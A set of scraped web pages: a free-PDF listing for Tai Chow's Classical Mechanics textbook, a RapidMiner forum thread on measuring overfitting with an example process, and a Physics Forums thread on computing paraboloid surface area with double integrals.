[ "Math shortcuts, Articles, worksheets, Exam tips, Question, Answers, FSc, BSc, MSc\n\n#### Keep Connect with Us\n\n• =", null, "", null, "JOIN OUR 33,890 + FANS", null, "JOIN OUR 100 + FANS\n\nMathSchool Search Box\n• Welcome in Math School.\n• This is beta verion of our website.\n\nclassical mechanics 2nd edition, tai l chow [pdf] MathSchool\n\n### Classical Mechanics Second Edition By Tai L. Chow\n\nMathSchoolinternational contain thousands of Mathematics Free Books and Physics Free Books. Which cover almost all topics for students of Mathematics, Physics and Engineering. We have also collected other Best Free Math Websites", null, "for teachers and students.\nHere is extisive list of Best Classical Mechanics Books . We hope person who’s interested in Physics like these books.", null, "Classical Mechanics, 2E written by Tai Chow .\nThis book presents a reasonably complete account of the theoretical mechanics of particles and systems for physics students at the advanced undergraduate level. It is evolved from a set of lecture notes for a course on the subject, which I have taught at California State University, Stanislaus, for many years. We presume that the student has been exposed to a calculus-based general physics course (from a textbook such as that by Halliday and Resnick) and a course in calculus (including the handling of differentiations of field functions). No prior knowledge of differential equations is required. Differential equations and new mathematical methods are developed in the text as the occasion demands. Vectors are used from the start.\nThe book has 17 chapters, and with appropriate omission, the essential topics can be covered in a one-semester, four-hour course. We do not make any specific suggestions for a shorter course. We usually vary the topics to suit the ability and mathematical background of the students. We would encourage the more enthusiastic and able students to attempt to master on their own the material not covered in class (for extra credit). A major departure of this book from the conventional approach is the introduction of the Lagrangian and Hamiltonian formulations of mechanics at an early stage. In the conventional approach to the subject, Lagrangian and Hamiltonian formulations are presented near the end of the course, and students rarely develop a reasonable familiarity with these essential methods.\n\nBook Detail :-\nTitle: Classical Mechanics\nEdition: Second Edition\nAuthor(s): Tai L. Chow\nPublisher:\nSeries:\nYear:\nPages: 631\nType: PDF\nLanguage: English\nISBN: 978-1-4665-7000-9\nCountry: US\n\nAbout Author :- The author Tai L. Chow, California State University Stanislaus, Turlock, CA, USA.\n\nMath Formulas's Top Books:-\nMath Formulas's Top Books recommended for you.\n1300 Math Formulas by Alex-Svirin Ph.D.\nSchaum Mathematical Handbook Formulas Tables (5E)\nCRC Standard Mathematical Tables, Formulas (33E) By Daniel Zwillinger\n\nBook Contents :-\nClassical Mechanics, 2E written by Tai Chow cover the following topics. '\n1. Kinematics: Describing the Motion\n2. Newtonian Mechanics\n3. Integration of Newton’s Equation of Motion\n4. Lagrangian Formulation of Mechanics: Descriptions of Motion in Configuration Space\n5. Hamiltonian Formulation of Mechanics: Descriptions of Motion in Phase Spaces\n6. Motion Under a Central Force\n7. Harmonic Oscillator\n8. Coupled Oscillations and Normal Coordinates\n9. Nonlinear Oscillations\n10. Collisions and Scatterings\n11. Motion in Non-Inertial Systems\n12. Motion of Rigid Bodies\n13. 
Theory of Special Relativity\n14. Newtonian Gravity and Newtonian Cosmology\n15. Hamilton–Jacobi Theory of Dynamics\n16. Introduction to Lagrangian and Hamiltonian Formulations for Continuous Systems and Classical Fields\nAppendix-1 Vector Analysis and Ordinary Differential Equations\nAppendix-2 D’Alembert’s Principle and Lagrange’s Equations\nAppendix-3 Derivation of Hamilton’s Principle from D’Alembert’s Principle\nAppendix-4 Noether’s Theorem.\nAppendix-5 Conic Sections, Ellipse, Parabola, and Hyperbola.\n\nNote:-\n\nWe are not the owner of this book/notes. We provide it which is already avialable on the internet. For any further querries please contact us. We never SUPPORT PIRACY. This copy was provided for students who are financially troubled but want studeing to learn. If You Think This Materials Is Useful, Please get it legally from the PUBLISHERS. Thank you.\n\n?1\n\n?2\n\n##### SHORTCUT TRICKS (Division)\n• Divisible by 2 Shortcut trick\n• Divisible by 3 Shortcut trick\n• Divisible by 4 Shortcut trick\n• Divisible by 5 Shortcut trick\n• Divisible by 6 Shortcut trick", null, "• Divisible by 7 Shortcut trick", null, "• Divisible by 8 Shortcut trick", null, "• Divisible by 9 Shortcut trick\n• Divisible by 10 Shortcut trick\n\n##### Worksheets (Solved)\n\n###### Integration", null, "", null, "", null, "", null, "", null, "" ]
[ null, "https://mathschoolinternational.com/images/logoMedium.gif", null, "https://mathschoolinternational.com/Images/FaceBooklogo.jpg", null, "https://mathschoolinternational.com/Images/Twitterlogo.jpg", null, "https://mathschoolinternational.com/Images/New.gif", null, "https://mathschoolinternational.com/Physics-Books/Mechanics/Books/Classical-Mechanics-2E--Tai-Chow.jpg", null, "https://mathschoolinternational.com/Images/New.gif", null, "https://mathschoolinternational.com/Images/New.gif", null, "https://mathschoolinternational.com/Images/New.gif", null, "https://mathschoolinternational.com/Images/New.gif", null, "https://mathschoolinternational.com/images/advertise-here2.jpg", null, "https://mathschoolinternational.com/images/ExamTips.png", null, "https://mathschoolinternational.com/images\\100Marks.jpg", null, "https://mathschoolinternational.com/Physics-Books/Mechanics/..\\..\\images\\Times-of-India-Education-Display-Ads.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88665557,"math_prob":0.58512664,"size":4076,"snap":"2023-40-2023-50","text_gpt3_token_len":891,"char_repetition_ratio":0.10756385,"word_repetition_ratio":0.02310231,"special_character_ratio":0.19676153,"punctuation_ratio":0.13835616,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.95085293,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-01T13:45:35Z\",\"WARC-Record-ID\":\"<urn:uuid:416e6ba7-1cb6-44bc-a34e-91ab841b6733>\",\"Content-Length\":\"71155\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e2a98a6b-27cb-4aa3-83a6-2849e0fa5aaf>\",\"WARC-Concurrent-To\":\"<urn:uuid:b54b2590-de86-4382-919c-b7e6bf914cc8>\",\"WARC-IP-Address\":\"65.108.97.18\",\"WARC-Target-URI\":\"https://mathschoolinternational.com/Physics-Books/Mechanics/Classical-Mechanics-2E--Tai-Chow.aspx\",\"WARC-Payload-Digest\":\"sha1:BD5HUORFXNB3OKB3RYCRTHH3XE55NHOU\",\"WARC-Block-Digest\":\"sha1:AJE6WGHUVBU3SDTKB5O3PPZOC4ZMPLN3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100287.49_warc_CC-MAIN-20231201120231-20231201150231-00872.warc.gz\"}"}
https://community.rapidminer.com/discussion/14911/relative-overfitting-rate
[ "# Relative Overfitting Rate\n\nMember Posts: 19", null, "Maven\nHi there,\n\nI have a question regarding the calculation of the \"relative overfitting rate\". Background is the comparison of different parameter settings and their overfitting behavior respectively.\n\nThe relative overfitting rate was proposed in:\nEfron, B.; Tibshirani, R.: Improvements on Cross-Validation: The .632+ Bootstrap Method. Journal of the American Statistical Association. (1997), Nr. 92, S. 548–560.\n\nIn this paper the .632 Bootstrap Method is enhaced by some sort of weighting mechanism, which is irrelevant for this post. Anyway, the relevant question regards the formula for the relative overfitting rate which is defined in formula 28 (see below). R being the relative overfitting rate, Êrr1 being the Bootstrap-Leave-one-out Error and err being the \"emprical error\" (Formula 7). Formula 27 shows the calculation of gamma for a binary classificator.", null, "Now here is the question:\n\nCan anyone please explain the me how I can adapt this concept for a regression problem? I have a dataset of 30 Attributes and about 300 examples for which I create a prediction for a label (range 0,01 to 0,1). I have trouble understanding the mathematics behind it.. and the writing. I can retrieve the Êrr1 from the bootstrap operator of RM, but how do I calculate the rest?\n\nAny help greatly appreciated..\nBest regards\n\n• Member Posts: 537", null, "Guru\nDear Tek,\n\nFirst you should measure the variability in your cross validation estimates.\n\nBest regards,\n\nWessel\n• Member Posts: 19", null, "Maven\nHi there,\n\nthanks for the reply. How do I measure the variability?\n\nBesides, I found some new information. I now understand that err, is the generalization error (Test and Training set are equal). And, that for an information about the overfitting I need some sort of \"number\" to describe the maximal overfitting (here it is gamma, or the \"no information error\"). Gamma is described as \"the averaged permutation of all possible labels with all possible predictors\".\n\nBut still, two questions remain:\n\n1. How the hell do I actually calculate gamma?\n2. For regression, do I have to replace the error function with RMS? 
(which actually would make sense in a certain way)

Best regards

• Member Posts: 537 · Guru

Hey,

This is part of my own unpublished research, so I don't want to give every detail.

One way to calculate the variance in the error of the estimate is as follows:
1. Split the data in two parts.
2. Run cross-validation on the first part to obtain a performance estimate.
3. Apply the model (trained on the first part of the data) to the second part of the data and obtain the real performance.
4. Calculate the difference (error) between the real performance and the performance estimate.
5. Repeat this procedure for many different data splits.

So basically this is a way to validate the validation procedure.
Theory states that cross-validation is an unbiased estimate, so you expect the attribute "esti-real" to have a mean close to zero.
For the synthetic data set I used it was 4.0, so rather close to zero.
After you compute the variance, "(esti-real)^2": 1080.5, you realize the variance is rather high.
So theory states there is room for improvement.

One way to reduce the variance is to use a different value of k in k-fold cross-validation.
But recent developments suggest that it's better to use multiple values of k, or to combine cross-validation with bootstrap validation.

    real             avg = 79.3372 +/- 19.6535 [33.9304 ; 129.2291]
    prediction(real) avg = 79.3372 +/- 5.4302 [66.9098 ; 88.8779]
    esti             avg = 83.3311 +/- 21.3748 [45.7766 ; 132.2486]
    esti-real        avg = 3.9939 +/- 32.7915 [-66.4296 ; 93.7430]
    (esti-real)^2    avg = 1080.4833 +/- 1364.4548 [0.0276 ; 8787.7420]

(figure omitted)

• Member Posts: 537 · Guru

<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>\n<process version=\"5.1.008\">\n<context>\n<input/>\n<output/>\n<macros/>\n</context>\n<operator activated=\"true\" class=\"process\" compatibility=\"5.1.008\" expanded=\"true\" name=\"Process\">\n<process expanded=\"true\" height=\"391\" width=\"701\">\n<operator activated=\"true\" class=\"retrieve\" compatibility=\"5.1.008\" expanded=\"true\" height=\"60\" name=\"Retrieve\" width=\"90\" x=\"45\" y=\"30\">\n<parameter key=\"repository_entry\" value=\"//Samples/data/Polynomial\"/>\n</operator>\n<operator activated=\"true\" class=\"loop\" compatibility=\"5.1.008\" expanded=\"true\" height=\"94\" name=\"Loop Procedure\" width=\"90\" x=\"179\" y=\"30\">\n<parameter key=\"iterations\" value=\"100\"/>\n<process expanded=\"true\" height=\"409\" width=\"705\">\n<operator activated=\"true\" class=\"split_data\" compatibility=\"5.1.008\" expanded=\"true\" height=\"94\" name=\"Split Outer\" width=\"90\" x=\"45\" y=\"165\">\n<enumeration key=\"partitions\">\n<parameter key=\"ratio\" value=\"0.9\"/>\n<parameter key=\"ratio\" value=\"0.1\"/>\n</enumeration>\n<parameter key=\"sampling_type\" value=\"stratified sampling\"/>\n</operator>\n<operator activated=\"true\" class=\"x_validation\" compatibility=\"5.1.008\" expanded=\"true\" height=\"112\" name=\"Validation\" width=\"90\" x=\"180\" y=\"30\">\n<parameter key=\"sampling_type\" value=\"shuffled sampling\"/>\n<process expanded=\"true\" height=\"409\" width=\"299\">\n<operator activated=\"true\" class=\"linear_regression\" compatibility=\"5.1.008\" expanded=\"true\" height=\"94\" name=\"Linear Regression (2)\" width=\"90\" x=\"112\" y=\"30\"/>\n<connect from_port=\"training\" to_op=\"Linear Regression (2)\" to_port=\"training set\"/>\n<connect from_op=\"Linear Regression (2)\" from_port=\"model\" to_port=\"model\"/>\n<portSpacing
port=\"source_training\" spacing=\"0\"/>\n<portSpacing port=\"sink_model\" spacing=\"0\"/>\n<portSpacing port=\"sink_through 1\" spacing=\"0\"/>\n</process>\n<process expanded=\"true\" height=\"409\" width=\"346\">\n<operator activated=\"true\" class=\"apply_model\" compatibility=\"5.1.008\" expanded=\"true\" height=\"76\" name=\"Apply Inner\" width=\"90\" x=\"45\" y=\"30\">\n<list key=\"application_parameters\"/>\n</operator>\n<operator activated=\"true\" class=\"performance\" compatibility=\"5.1.008\" expanded=\"true\" height=\"76\" name=\"Perf Inner\" width=\"90\" x=\"246\" y=\"30\"/>\n<connect from_port=\"model\" to_op=\"Apply Inner\" to_port=\"model\"/>\n<connect from_port=\"test set\" to_op=\"Apply Inner\" to_port=\"unlabelled data\"/>\n<connect from_op=\"Apply Inner\" from_port=\"labelled data\" to_op=\"Perf Inner\" to_port=\"labelled data\"/>\n<connect from_op=\"Perf Inner\" from_port=\"performance\" to_port=\"averagable 1\"/>\n<portSpacing port=\"source_model\" spacing=\"0\"/>\n<portSpacing port=\"source_test set\" spacing=\"0\"/>\n<portSpacing port=\"source_through 1\" spacing=\"0\"/>\n<portSpacing port=\"sink_averagable 1\" spacing=\"0\"/>\n<portSpacing port=\"sink_averagable 2\" spacing=\"0\"/>\n</process>\n</operator>\n<operator activated=\"true\" class=\"apply_model\" compatibility=\"5.1.008\" expanded=\"true\" height=\"76\" name=\"Apply Outer\" width=\"90\" x=\"313\" y=\"165\">\n<list key=\"application_parameters\"/>\n</operator>\n<operator activated=\"true\" class=\"performance\" compatibility=\"5.1.008\" expanded=\"true\" height=\"76\" name=\"Perf Outer\" width=\"90\" x=\"447\" y=\"120\"/>\n<operator activated=\"true\" class=\"log\" compatibility=\"5.1.008\" expanded=\"true\" height=\"94\" name=\"Log\" width=\"90\" x=\"585\" y=\"30\">\n<list key=\"log\">\n<parameter key=\"estimate\" value=\"operator.Perf Inner.value.performance\"/>\n<parameter key=\"real\" value=\"operator.Perf Outer.value.performance\"/>\n<parameter key=\"iteration\" value=\"operator.Loop Procedure.value.iteration\"/>\n</list>\n</operator>\n<connect from_port=\"input 1\" to_op=\"Split Outer\" to_port=\"example set\"/>\n<connect from_op=\"Split Outer\" from_port=\"partition 1\" to_op=\"Validation\" to_port=\"training\"/>\n<connect from_op=\"Split Outer\" from_port=\"partition 2\" to_op=\"Apply Outer\" to_port=\"unlabelled data\"/>\n<connect from_op=\"Validation\" from_port=\"model\" to_op=\"Apply Outer\" to_port=\"model\"/>\n<connect from_op=\"Apply Outer\" from_port=\"labelled data\" to_op=\"Perf Outer\" to_port=\"labelled data\"/>\n<connect from_op=\"Perf Outer\" from_port=\"performance\" to_op=\"Log\" to_port=\"through 1\"/>\n<connect from_op=\"Log\" from_port=\"through 2\" to_port=\"output 2\"/>\n<portSpacing port=\"source_input 1\" spacing=\"90\"/>\n<portSpacing port=\"source_input 2\" spacing=\"0\"/>\n<portSpacing port=\"sink_output 1\" spacing=\"0\"/>\n<portSpacing port=\"sink_output 2\" spacing=\"0\"/>\n<portSpacing port=\"sink_output 3\" spacing=\"0\"/>\n</process>\n</operator>\n<operator activated=\"true\" class=\"log_to_data\" compatibility=\"5.1.008\" expanded=\"true\" height=\"94\" name=\"Log to Data\" width=\"90\" x=\"313\" y=\"30\">\n<parameter key=\"log_name\" value=\"Log\"/>\n</operator>\n<operator activated=\"true\" class=\"store\" compatibility=\"5.1.008\" expanded=\"true\" height=\"60\" name=\"Store\" width=\"90\" x=\"447\" y=\"30\">\n<parameter key=\"repository_entry\" value=\"X\"/>\n</operator>\n<operator activated=\"true\" class=\"retrieve\" compatibility=\"5.1.008\" 
expanded=\"true\" height=\"60\" name=\"Result\" width=\"90\" x=\"45\" y=\"165\">\n<parameter key=\"repository_entry\" value=\"X\"/>\n</operator>\n<operator activated=\"true\" class=\"set_role\" compatibility=\"5.1.008\" expanded=\"true\" height=\"76\" name=\"label: real\" width=\"90\" x=\"179\" y=\"165\">\n<parameter key=\"name\" value=\"real\"/>\n<parameter key=\"target_role\" value=\"label\"/>\n</operator>\n<operator activated=\"true\" class=\"select_attributes\" compatibility=\"5.1.008\" expanded=\"true\" height=\"76\" name=\"input: estimate\" width=\"90\" x=\"313\" y=\"165\">\n<parameter key=\"attribute_filter_type\" value=\"single\"/>\n<parameter key=\"attribute\" value=\"estimate\"/>\n</operator>\n<operator activated=\"true\" class=\"linear_regression\" compatibility=\"5.1.008\" expanded=\"true\" height=\"94\" name=\"Linear Regression\" width=\"90\" x=\"447\" y=\"165\"/>\n<operator activated=\"true\" class=\"apply_model\" compatibility=\"5.1.008\" expanded=\"true\" height=\"76\" name=\"Apply Model\" width=\"90\" x=\"581\" y=\"165\">\n<list key=\"application_parameters\"/>\n</operator>\n<operator activated=\"true\" class=\"generate_attributes\" compatibility=\"5.1.008\" expanded=\"true\" height=\"76\" name=\"Generate Attributes\" width=\"90\" x=\"581\" y=\"255\">\n<list key=\"function_descriptions\">\n<parameter key=\"estimate-real\" value=\"estimate-real\"/>\n<parameter key=\"abs(estimate-real)\" value=\"abs(estimate-real)\"/>\n</list>\n</operator>\n<connect from_op=\"Retrieve\" from_port=\"output\" to_op=\"Loop Procedure\" to_port=\"input 1\"/>\n<connect from_op=\"Loop Procedure\" from_port=\"output 1\" to_op=\"Log to Data\" to_port=\"through 1\"/>\n<connect from_op=\"Log to Data\" from_port=\"exampleSet\" to_op=\"Store\" to_port=\"input\"/>\n<connect from_op=\"Store\" from_port=\"through\" to_port=\"result 1\"/>\n<connect from_op=\"Result\" from_port=\"output\" to_op=\"label: real\" to_port=\"example set input\"/>\n<connect from_op=\"label: real\" from_port=\"example set output\" to_op=\"input: estimate\" to_port=\"example set input\"/>\n<connect from_op=\"input: estimate\" from_port=\"example set output\" to_op=\"Linear Regression\" to_port=\"training set\"/>\n<connect from_op=\"Linear Regression\" from_port=\"model\" to_op=\"Apply Model\" to_port=\"model\"/>\n<connect from_op=\"Linear Regression\" from_port=\"exampleSet\" to_op=\"Apply Model\" to_port=\"unlabelled data\"/>\n<connect from_op=\"Apply Model\" from_port=\"labelled data\" to_op=\"Generate Attributes\" to_port=\"example set input\"/>\n<connect from_op=\"Apply Model\" from_port=\"model\" to_port=\"result 2\"/>\n<connect from_op=\"Generate Attributes\" from_port=\"example set output\" to_port=\"result 3\"/>\n<portSpacing port=\"source_input 1\" spacing=\"0\"/>\n<portSpacing port=\"sink_result 1\" spacing=\"0\"/>\n<portSpacing port=\"sink_result 2\" spacing=\"126\"/>\n<portSpacing port=\"sink_result 3\" spacing=\"54\"/>\n<portSpacing port=\"sink_result 4\" spacing=\"0\"/>\n</process>\n</operator>\n</process>\n\n• Member Posts: 19", null, "Maven\nHi,\n\nthats an interesting process. I did some further research on the overfitting subject, though. In regard to your process, is it possible to feed the ANOVA (performance) operator the real true values of the dataset? 
So, i.e.:

Input 1 is the performance vector (or rather the predictions) of the trained model.
Input 2 is the real (true) label values of the original data set.

If that's not possible, I would have to find a way to output the predictions and calculate the ANOVA (R², respectively) in Excel.

Thanks again!

• Member Posts: 537 · Guru

Hey,

I'm not sure I understand the question.
R squared is a measure used when training and testing on the same data.
There is also corrected R squared, which corrects for the number of parameters.

You can calculate R squared using the Linear Regression operator (I think), and also using the T-Test operator or ANOVA operator (I think).
But I never used this, because the measure is ill suited: for a lot of learners the number of parameters is an ill-defined concept.

Best regards,

Wessel

• Member Posts: 19 · Maven

Hey,

let me try to clarify that:

R² is defined as the fraction "variance explained through regression" / "total variance", or alternatively: 1 - "variance not explained by regression" / "total variance". In the ANOVA chart this is equivalent to "between" / "total", or 1 - "residual" / "total", respectively.

Furthermore, in regression, R² is an indicator of how well a function fits its underlying data. Thus, an R² close to 1 CAN already be a first indicator of overfitting, because all of the variance is explained through the regression model (but certainly this is not the holy grail, because it might very well be that the trained model just fits the data well). In the next step, one can compare the change of R² between the training phase and the test phase (here I mean the holdout method, using new unseen data) and the change of error, too.

Now, my idea is this: if R² shrinks from the training to the testing phase (again, by "testing phase" I don't mean the X-Validation testing phase, but rather the actual test on unseen data), one can suspect overfitting on the training data. A second indicator would be that the error increases from training to testing.

This is due to the definition of R²: if overfitting occurred, then unseen data is predicted incorrectly, so the "variance explained through regression" will shrink, while the "total variance" might not change at all, thus causing R² to shrink. On the other hand, the error on unseen data should increase relative to the error on the training data (which is overfitted, and thus very small).

Combining these two, maybe one can make assumptions about overfitting?

Thanks for further help! Maybe I am completely wrong with my assumptions here. ; )

PS: You mentioned R² is only used if training and test data are the same. Wouldn't it be more correct that R² can only be used if the means of the training and testing data are the same?

PSPS: Another idea: if you compare the residuals (let's say in a histogram) from the training to the testing phase, the histogram should change its shape from a pyramid-shaped form to a more U-shaped form? (Rephrased: the overfitted model cannot predict the unseen data correctly, thus the number of bigger residuals will increase.)
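Since the thread never spells out the gamma computation, here is a minimal Python sketch of the two quantities under discussion, adapted to regression with a squared-error loss. The formulas for γ and R follow Efron & Tibshirani (1997); everything else (the data, the fitted model, and the leave-one-out bootstrap estimate `err1`) is a placeholder you would supply yourself, e.g. from RapidMiner's log output.

```
import numpy as np

def no_information_error(y_true, y_pred):
    """Gamma for squared-error loss: the average loss over ALL pairs
    (observation i, prediction j), i.e. the expected error if the
    predictors carried no information about the labels."""
    y_true = np.asarray(y_true, dtype=float)
    y_pred = np.asarray(y_pred, dtype=float)
    diffs = y_true[:, None] - y_pred[None, :]   # n x n matrix of y_i - yhat_j
    return float(np.mean(diffs ** 2))

def relative_overfitting_rate(err1, err_bar, gamma):
    """R = (err1 - err_bar) / (gamma - err_bar), clipped to [0, 1].
    err1    : leave-one-out bootstrap error (e.g. from the Bootstrap operator)
    err_bar : apparent (resubstitution) error on the training data."""
    if gamma <= err_bar:               # degenerate case: no room for overfitting
        return 0.0
    return float(min(max((err1 - err_bar) / (gamma - err_bar), 0.0), 1.0))

# Hypothetical usage with a fitted model `m` and training data (X, y):
# y_hat   = m.predict(X)
# err_bar = float(np.mean((np.asarray(y) - y_hat) ** 2))
# gamma   = no_information_error(y, y_hat)
# R       = relative_overfitting_rate(err1, err_bar, gamma)
```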
[ null, "https://s3.amazonaws.com/rapidminer.community/vanilla-rank-images/maven-16x16.png ", null, "http://i55.tinypic.com/rtn4va.jpg", null, "https://s3.amazonaws.com/rapidminer.community/vanilla-rank-images/guru-16x16.png ", null, "https://s3.amazonaws.com/rapidminer.community/vanilla-rank-images/maven-16x16.png ", null, "https://s3.amazonaws.com/rapidminer.community/vanilla-rank-images/guru-16x16.png ", null, "http://s1.postimage.org/5tckg4owo/real_estimate.png", null, "https://s3.amazonaws.com/rapidminer.community/vanilla-rank-images/guru-16x16.png ", null, "https://s3.amazonaws.com/rapidminer.community/vanilla-rank-images/maven-16x16.png ", null, "https://s3.amazonaws.com/rapidminer.community/vanilla-rank-images/guru-16x16.png ", null, "https://s3.amazonaws.com/rapidminer.community/vanilla-rank-images/maven-16x16.png ", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6569487,"math_prob":0.7353522,"size":15714,"snap":"2022-40-2023-06","text_gpt3_token_len":3991,"char_repetition_ratio":0.14735837,"word_repetition_ratio":0.22961038,"special_character_ratio":0.28452337,"punctuation_ratio":0.103264995,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9973933,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,null,null,6,null,null,null,null,null,null,null,6,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-02-07T09:13:55Z\",\"WARC-Record-ID\":\"<urn:uuid:7c4924b8-d67c-4437-ae8f-05430faf01bf>\",\"Content-Length\":\"93606\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0f595990-bc6f-4729-9cc7-dcce0a981b37>\",\"WARC-Concurrent-To\":\"<urn:uuid:35ae61e3-dee3-42fe-bd5c-c200481ff338>\",\"WARC-IP-Address\":\"162.159.138.78\",\"WARC-Target-URI\":\"https://community.rapidminer.com/discussion/14911/relative-overfitting-rate\",\"WARC-Payload-Digest\":\"sha1:5LRHSB6V7J2A72VHZYDTWHMOCRSU73KY\",\"WARC-Block-Digest\":\"sha1:GKNTDWS3FDD42JHDUY6UW6RDGEDUC5IO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764500392.45_warc_CC-MAIN-20230207071302-20230207101302-00711.warc.gz\"}"}
https://www.physicsforums.com/threads/finding-surface-area-using-double-integrals.553275/
[ "# Finding surface area using double integrals\n\n## Homework Statement\n\nThe portion of the paraboloid 2z=x^2+y^2 that is inside the cylinder x^2+y^2=8\n\n## The Attempt at a Solution\n\nmy attempt was that i would turn this into polar coordinates and solve that integral but is it right? I came up with\n\nRelated Calculus and Beyond Homework Help News on Phys.org\nSimon Bridge\nHomework Helper\nLCKurtz\nHomework Helper\nGold Member\n\n## Homework Statement\n\nThe portion of the paraboloid 2z=x^2+y^2 that is inside the cylinder x^2+y^2=8\n\n## The Attempt at a Solution\n\nmy attempt was that i would turn this into polar coordinates and solve that integral but is it right? I came up with\nThat integral isn't correct. Show us how you calculated dS.\n\nwoops my limits arent right on that, it should go from 0 to sqrt(8). is that what is wrong?\n\nLCKurtz\nHomework Helper\nGold Member\nThat integral isn't correct. Show us how you calculated dS.\nwoops my limits arent right on that, it should go from 0 to sqrt(8). is that what is wrong?\nThat's one thing.\n\nwell i know that a cylinder makes the dr integral go from 0 to sqrt(8), and I know for dθ it goes all the way around so i know thats from 0 to 2pi, and for my integral i just did (x^2+y^2)/2 and then converted that to polar so it would be r^2/2 and then wrote out the complete equation ie\n\nLCKurtz\nHomework Helper\nGold Member\nwell i know that a cylinder makes the dr integral go from 0 to sqrt(8), and I know for dθ it goes all the way around so i know thats from 0 to 2pi, and for my integral i just did (x^2+y^2)/2 and then converted that to polar so it would be r^2/2 and then wrote out the complete equation ie\nThat would be right if you were asked to calculate the volume under the paraboloid and above the xy plane. But the title of your thread says you are asked to get the surface area of the paraboloid inside the cylinder. That is why I keep asking you for dS.\n\nHallsofIvy\nHomework Helper\nAny surface can be written as a vector equation:\n$$\\vec{r}(u,v)= x(u,v)\\vec{i}+ y(u,v)\\vec{j}+ z(u,v)\\vec{k}$$\nwhere u and v are parameters.\n\nThe vectors\n$$\\vec{r}_u(u,v)= x_u\\vec{i}+ y_u\\vec{j}+ z_u\\vec{k}$$\nand\n$$\\vec{r}_v(u,v)= x_v\\vec{i}+ y_v\\vec{j}+ z_v\\vec{k}$$\n\nare tangent vectors. Their cross product gives the \"differential of surface area\":\n$$dS= \\left|\\vec{r}_u\\times \\vec{r}_v\\right|du dv$$\n\nwow im an idiot. so the equation i found was\nsa=double integral of the sqrt((fx)^2 + (fy)^2 +1)\n\nso this was my equation\nhttp://gyazo.com/a90a63c1d98779233c0a246864823cd4\nwith the respective integrals of course. is that right?\nand If it is, i know i have to convert it to polar, which looks terribly difficult\n\nLast edited:\nSimon Bridge\nHomework Helper\nI gave you a link which shows you how to work out the integrand and do the conversion.\nYou have to scroll down to the bit where it shows you the example related to your problem.\nI suspect you are still thinking in terms of integrating some function provided. Get that out of your head - the dS takes care of that for you. (Either that or you forgot to do the cross product...)\n\nThe thinking:\nIn general - when you have a flat area to calculate, you stamp the area with small squares and count them. dS is that small area. If the rea is flat then the sides of the small squares are dx and dy then the surface area of each is dS=dxdy. The Area of the whole surface is the sum of all the little areas like this:\n\n$$\\int_{Y} \\int_{X} dxdy$$ ... 
where X and Y represent the limits of integration.\nNotice how there is apprently no function to integrate? The function in question is g(x,y)=1 - because the surface is flat, it's slope in the x and y directions is 1.\n\nThe area below a function in the x-y plane is a special case of this that simplifies to a single integral - so it is easier to teach.\nAs a double integral, the area under f(x) is:\n\n$$\\int_{a}^{b} \\int_{y=0}^{y=f(x)} 1dydx$$\n\nIf the area is not flat, then you project the squares onto the surface - so they look like parallelograms - the sides will be longer depending on the slope of the surface in their directions (hint: partial derivatives) and dS will be in terms of dxdy but modified for the area of a parallelogram. Which is basically what you've just done.\n\nBut you can also do this in other coordinate systems.\n\nIn polar coords, a small area at position $(r,\\theta)$ from the z axis, in a plane perpendicular to the z axis, which covers a distance $\\Delta r$ in the $r$ direction, and an angle $\\Delta \\phi$ in the $\\phi$ would be roughly $dS=(r\\Delta \\phi) \\Delta r$ - can you see why? In the limit that $\\Delta \\phi$ and $\\Delta r$ are very small, then this area is exact with:\n\n$$dS = r dr d\\phi$$\n\nBUT: the surface is not flat!\nA parabaloid about z in cylindrical-polar coords would be:\n\n$z=a(r+b)^2$\n\nSo the slope varies in the r direction - making the sides of dS longer in the r direction.\nA quick sketch of the situation will help.\n\n(BTW: You'll have noticed how useful LaTeX is by now - it is really worth learning.)\n\nLast edited:" ]
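As a cross-check of the polar-coordinate setup in this thread (added here for illustration, not part of the original posts): with z = (x² + y²)/2, the integrand sqrt(f_x² + f_y² + 1) becomes sqrt(1 + r²) in polar coordinates, and dA = r dr dθ. A short sympy sketch evaluates the integral:

```
from sympy import symbols, sqrt, integrate, pi, simplify

r, theta = symbols('r theta', positive=True)

# Paraboloid 2z = x^2 + y^2  =>  z = r^2/2, so z_r = r and the
# surface-area element is sqrt(1 + r^2) * r dr dtheta.
integrand = sqrt(1 + r**2) * r

inner = integrate(integrand, (r, 0, 2*sqrt(2)))   # cylinder x^2+y^2=8 => r = 2*sqrt(2)
area = simplify(integrate(inner, (theta, 0, 2*pi)))

print(area)          # 52*pi/3
print(float(area))   # about 54.45
```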
https://www.booksfree.mobi/2018/06/learn-convex-optimization-full.html
